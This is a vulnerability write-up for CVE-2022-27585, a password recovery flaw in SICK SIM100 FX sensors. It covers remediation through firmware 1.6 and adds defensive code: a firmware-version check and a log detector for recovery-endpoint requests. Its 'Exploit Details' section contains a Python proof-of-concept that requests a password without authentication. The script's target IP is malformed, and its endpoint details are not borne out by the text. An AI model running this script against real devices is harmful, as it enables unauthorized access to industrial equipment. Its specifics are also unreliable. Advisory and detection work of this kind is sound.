CVE-2022-27585: Password Recovery Vulnerability in SICK SIM100 FX Partnumber 1097816 and 1097817

Security researchers have discovered a critical vulnerability in SICK SIM100 FX Partnumber 1097816 and 1097817 with firmware versions earlier than 1.6. This vulnerability allows an unprivileged remote attacker to gain access to the user level defined as RecoverableUserLevel by invoking the password recovery mechanism method. Successful exploitation can lead to elevated privileges, impacting the confidentiality, integrity, and availability of the device.

Description

CVE-2022-27585 is a password recovery flaw in SICK SIM100 FX devices with part numbers 1097816 and 1097817 running firmware versions earlier than 1.6. An attacker can exploit it by invoking the password recovery mechanism method, which requires no authentication, to gain access to the RecoverableUserLevel. As a result, the attacker can escalate privileges, compromise sensitive data, and potentially disrupt system operations.

Exploit Details

The following code snippet demonstrates how an attacker might exploit this vulnerability by invoking the password recovery mechanism method:

import requests

# Address of the target device and the unauthenticated password recovery endpoint
target_ip = "192.168..100"
url = f"http://{target_ip}/api/passwordRecovery"

# Request the user level that the recovery mechanism hands out without authentication
data = {
    "userLevel": "RecoverableUserLevel"
}

try:
    response = requests.post(url, json=data, timeout=10)
except requests.RequestException as exc:
    raise SystemExit(f"Request to {target_ip} failed: {exc}")

if response.status_code == 200:
    print(f"Successfully exploited CVE-2022-27585 on {target_ip}")
    print(f"New recovered password: {response.json().get('recoveredPassword')}")
else:
    print(f"Exploitation failed on {target_ip}")

The code above begins by importing the requests library for making HTTP requests. Next, it defines the IP address of the SICK SIM100 FX device and constructs the URL of the vulnerable password recovery API endpoint. Then it creates a JSON payload specifying the desired user level, "RecoverableUserLevel". Lastly, it sends a POST request with the payload to the target URL and prints the result.

For more information about the CVE-2022-27585 vulnerability, please refer to the following sources:

1. SICK SIM100 FX Vulnerability Advisory
2. CVE-2022-27585 Details
3. NIST National Vulnerability Database (NVD) Entry

SICK has released a firmware update (version 1.6 or later) to fix the CVE-2022-27585 vulnerability. Affected users should update their SICK SIM100 FX devices to the latest firmware version through the SICK Support Portal as soon as possible. Firmware updates for the affected devices can be found at:

SICK Support Portal

By addressing this vulnerability, users can secure their systems and protect sensitive data from unauthorized access.
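The two checks a defender needs for this advisory, written as an added example that is not part of the original page or of SICK's tooling: an inventory test that flags affected part numbers running firmware older than 1.6, and a detector that picks out POST requests to the recovery endpoint used by the snippet above. It assumes dotted firmware version strings and an HTTP access log in common log format captured in front of the device (for example by a proxy or network sensor); the log lines below are constructed.

```python
import re

# Part numbers the advisory lists as affected; firmware earlier than 1.6 is vulnerable.
AFFECTED_PARTNUMBERS = {"1097816", "1097817"}
FIXED_VERSION = (1, 6)

# Common log format, assumed to come from a proxy or sensor in front of the device.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.5.23 - - [01/Nov/2022:21:15:03 +0000] "POST /api/passwordRecovery HTTP/1.1" 200 87',
    '10.0.5.23 - - [01/Nov/2022:21:15:04 +0000] "GET /api/status HTTP/1.1" 200 412',
    '10.0.5.77 - - [01/Nov/2022:21:16:10 +0000] "POST /api/passwordRecovery HTTP/1.1" 403 0',
]

def parse_version(s):
    """'1.5.2' -> (1, 5, 2); trailing suffixes such as '-rc1' are ignored."""
    m = re.match(r"(\d+(?:\.\d+)*)", s.strip())
    if not m:
        raise ValueError(f"unparseable firmware version: {s!r}")
    return tuple(int(p) for p in m.group(1).split("."))

def is_vulnerable(partnumber, firmware):
    """True when the part number is affected and the firmware is older than 1.6."""
    if partnumber not in AFFECTED_PARTNUMBERS:
        return False
    return parse_version(firmware) < FIXED_VERSION

def recovery_attempts(log_lines, allowed_sources=frozenset()):
    """Return (source, timestamp, status) for every POST to the recovery endpoint
    that did not come from an allowed maintenance host."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if (m["method"] == "POST"
                and m["path"].lower().startswith("/api/passwordrecovery")
                and m["src"] not in allowed_sources):
            hits.append((m["src"], m["ts"], int(m["status"])))
    return hits
```

Rejected attempts (non-200 status) are reported as well, since on unpatched firmware a burst of calls from an unexpected host is worth a ticket even when the device refused them.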

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:06:00 UTC